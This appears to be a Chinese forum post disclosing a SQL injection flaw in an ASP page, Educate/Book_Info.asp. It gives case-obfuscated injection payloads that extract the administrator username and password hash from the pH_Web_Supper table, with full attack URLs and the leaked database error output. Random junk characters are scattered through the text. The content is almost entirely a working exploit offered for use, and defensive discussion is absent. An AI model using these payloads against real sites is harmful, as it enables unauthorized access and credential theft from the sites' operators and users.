漏洞出现在Educate/Book_Info.asp
, u$ D$ x q% g. b& I+ {
: w- F) a% e, P/ J9 q$ ^此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出9 c& h/ q0 F' v
/ K* g$ k* y; O; O9 e9 P0 dexp:如下+ _( H: B) Z) }2 q1 J4 F
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)" U, p, a8 Z: ?2 D' G* i* P; ]
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; K& X. T7 I9 i: m* Z& V0 J 1 _' b* O2 P2 t* R8 C- u A5 q7 l- a
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). }2 K: n2 n" W
3 f$ S- m% a* \3 T0 S4 {7 ^* w
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
" x- u, Y8 Q' a6 c g6 c 0 O; z7 V& A, E/ e
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。% V& i3 {8 f1 D! S
, P, x& v; B' f. Y/Educate/Book_Info.asp,行 8
, {6 J: R( t! B6 j b( R- H4 C: e7 J 8 {7 N. e) m+ G* H8 P( B
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ \+ }/ ~3 Z- @, ^ r
& N( u& U# H3 x2 V) K
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 H( v( _6 m7 P0 u! t! s% }0 a
+ w: ^8 i x% ] d- ?, C: v将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
% [* n9 \$ t- }- }0 H9 I! Z
8 G9 z4 ^2 u' t3 u/Educate/Book_Info.asp,行 8
% A4 @$ }, G5 c3 n- c P |